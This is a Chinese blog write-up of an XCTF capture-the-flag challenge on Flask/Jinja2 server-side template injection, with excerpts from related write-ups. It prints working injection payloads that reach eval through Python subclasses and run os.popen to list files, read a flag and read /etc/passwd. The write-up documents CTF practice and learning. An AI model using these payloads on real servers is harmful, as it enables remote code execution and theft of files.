XCTF---Web_python_template_injection

最新推荐文章于 2021-11-26 23:00:56 发布
最新推荐文章于 2021-11-26 23:00:56 发布
阅读量477 收藏
点赞数
分类专栏: 攻防世界练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45895555/article/details/106414196
版权

python template injection

(对于出学的我来说)python模板注入不熟。所以花了一天的时间看了不少文章,也慢慢了解了Flask/Jinja2.输入后显示(和xss是不是很像)在这里插入图片描述
之后输入**{{config.items()}}**是可以爆出一些内容的在这里插入图片描述
这里有些内容较深就不细究了。之后有偿试爆了一下类(看了文章,师傅说<type ‘file’>类,它是文件系统访问的关键,但是还没找到方法,所以 继续了一篇在这里插入图片描述

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}   
  {% if b.__class__ == {}.__class__ %}         //遍历基类 找到eval函数
    {% if 'eval' in b.keys() %}    //找到了
      {{ b['eval']('__import__("os").popen("ls").read()') }}  //导入cmd 执行popen里的命令 read读出数据
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
 
 
//然后cat 就可以
![{% for c in \[\].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b\['eval'\]('__import__("os").popen("cat /tmp/ddddd/2222/flag ").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}](https://img-blog.csdnimg.cn/20200528222610489.png)
//我们可以改里面的命令

输入之后在这里插入图片描述
cat一下
在这里插入图片描述

暂时用了这种方法,其他还待挖掘,学习快乐。

这里是师傅们的文章(可以读读):
https://xz.aliyun.com/t/2908
https://blog.csdn.net/iamsongyu/article/details/85861811
https://www.freebuf.com/articles/web/98619.html
https://www.freebuf.com/articles/web/98928.html
https://drops.org.cn/Python/flask-jinja2-ssti.html
https://bbs.ichunqiu.com/thread-47685-1-1.html?from=aqzx8

沐雨晴空
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[XCTF]攻防世界Web_python_template_injection模板注入
qq_37301470的博客
11-20 3482
模板注入 在url后访问地址/{{7*7}} 返回49 于是是模板注入 payload: http://111.200.241.244:52204/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}{% e
XCTF-Web-高手区-Web_python_template_injection
1stPeak's Blog
06-21 297
题目 解题 1、题目提示为python模板注入 猜测这里是SSTI(Server-Side Template Injection) 服务端模板注入,就是服务器模板中拼接了恶意用户输入导致各种漏洞。通过模板,Web应用可以把输入转换成特定的HTML文件或者email格式 2、测试一下 http://111.200.241.244:53038/{{1+1}} 经过该测试,说明存在SSTI 3、那么接下来可以使用相关payload进行验证 (1)payload1 查看所有模块 http://111.200.
2020.3.31 xctf(Web_python_template_injection)①
DSR446的博客
03-31 306
根据题意可知python模块注入 测试payload:http://111.198.29.45:31069/{{3+4}} 执行了{{}}中的代码。 {{''.__class__.__mro__[2].__subclasses__()}} {{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].list...
攻防世界XCTFWeb_python_template_injection
末初的CSDN博客
03-13 771
根据题意可知python模块注入 测试payload:http://111.198.29.45:31069/{{3+4}} 执行了{{}}中的代码。 获取指定节点下的所有键值对 Payload: {{ [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }} {{''.__class__.__mro__[2...
XCTF-攻防世界CTF平台-Web类——12、Web_python_template_injection(SSTI服务器模板注入、Flask框架之Jinja2模板渲染引擎)
Onlyone_1314的博客
11-26 1486
目录标题模板引擎SSTI服务器模板注入python模板注入Flask应用框架Jinja2模板渲染引擎Python中常用于ssti的魔术方法获取基类的一些方法获取基本类的子类四种方法读取flag(1)site._Printer类调用os.popen函数执行任意命令(2)site._Printer类调用os.listdir函数执行查看本级目录下的文件(3)catch_warnings类的linecache函数执行任意命令(4)遍历基类找函数执行__import __("os").popen("ls").read
XCTF-HW-pipeline附件
最新发布
11-09
附件
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF-RE】新手练习区-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5....下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 ...然后使用dex2jar将dex文件转换为jar文件,得到一个jar文件,这个...
XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
python template injection_XCTF-web_python_template_injection
weixin_29906279的博客
12-30 130
web_python_template_injection这里涉及到flask的ssti漏洞(服务端模板注入)。简单点说就是,在使用flask/jinja2的模板渲染函数render_template_string的同时,使用%s来替换字符串的时候,会把字符串中被{{}}包围内容当作变量解析。例如:@app.route('/')def hello_world():return 'Hello Wor...
XCTF 攻防世界】WEB 高手进阶区 Web_python_template_injection
weixin_45844670的博客
08-31 295
打开链接 只有一行字 提示这是python模板注入 也就是说可能是jinjia2、djingo、tornado中的一个模板 这里涉及到flask的ssti漏洞(服务端模板注入)。 简单点说就是,在使用flask/jinja2的模板渲染函数render_template_string的同时,使 用%s来替换字符串的时候,会把字符串中被{{}}包围内容当作变量解析。 举个例子 请求:xxxxxx.xxx/{{ 10*10 }} 响应:xxxxx.xxx/{{100}} Not Found! ...
攻防世界web进阶之Web_python_template_injection
胖虎很忙
10-11 3618
(1)简单探测 http://111.198.29.45:42611/{{7+7}} 返回 URL http://111.198.29.45:47259/14 not found 证明执行了这个命令, (2)http://111.198.29.45:47259/{{config.items()}} 查看系统配置; (3)读取passwd信息 {{ [].class.base.subc...
Web_php_include 和supersqli攻防世界xctf web
weixin_45689999的博客
03-03 494
Web_php_include 代码 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page);//相当于过滤了php:// } include($page...
[wp] 攻防世界 Web_python_template_injection
MercyLin的博客
09-28 6635
7*7变成49了,应该存在模板注入 http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()%7D%7D http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()[59].__init__.func_globals.key...
[wp] 攻防世界-i-got-id-200
MercyLin的博客
09-10 3387
点击Files,这里会把上传的文件的内容在下方输出,猜测后台逻辑: use strict; use warnings; use CGI; my $cgi= CGI->new; if ( $cgi->upload( 'file' ) ) { my $file= $cgi->param( 'file' ); while ( <$file> ) { print "...
XCTF攻防世界web进阶练习_ 5_mfw
silence1_的博客
05-02 3485
XCTF攻防世界web进阶练习—mfw 题目 题目为mfw,没有任何提示。 直接打开题目,是一个网站 大概浏览一下其中的内容,看到其中url变化其实只是get的参数的变化 查看它的源码,看到有一个?page=flag,flag应该在这个页面里面 但是进入这个页面发现是空的 注意到有这样一个页面,说道用到了Git方法,想到是否可能和Git源码泄露有关 于是试一下http://111.198.2...
XCTF python-trade
YenKoc的博客
01-15 641
一.查看文件类型 后缀名为pyc,说明是python字节码文件,python和java在编译方式上很像,都是编译兼并解释型,先编译成字节码,在虚拟机上解释成机器代码。 二.反编译 三.写个exp 分析每个字符的acsill值都先异或32,再加,之后base64编码 那么逆向回来的话,先base解码,再减少,再异或,转成字符串。 import base64 correct ='XlNkVmtUI1...
[wp] 攻防世界 ics-02
MercyLin的博客
09-29 2876
进去扫目录发现/secret 无法直接进入secret_debug.php 显示ip不对 点paper会向download.php传参,可以下载一个ssrf内容的pdf, 于是想到利用ssrf来访问secret_debug.php 发现参数s,fuzz一下,发现s=3时会有如下返回 经测试在此页面发现sql注入漏洞,进行注入得到flag,脚本如下: import requests impor...
pure_color xctf
07-16
pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,包括但不限于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值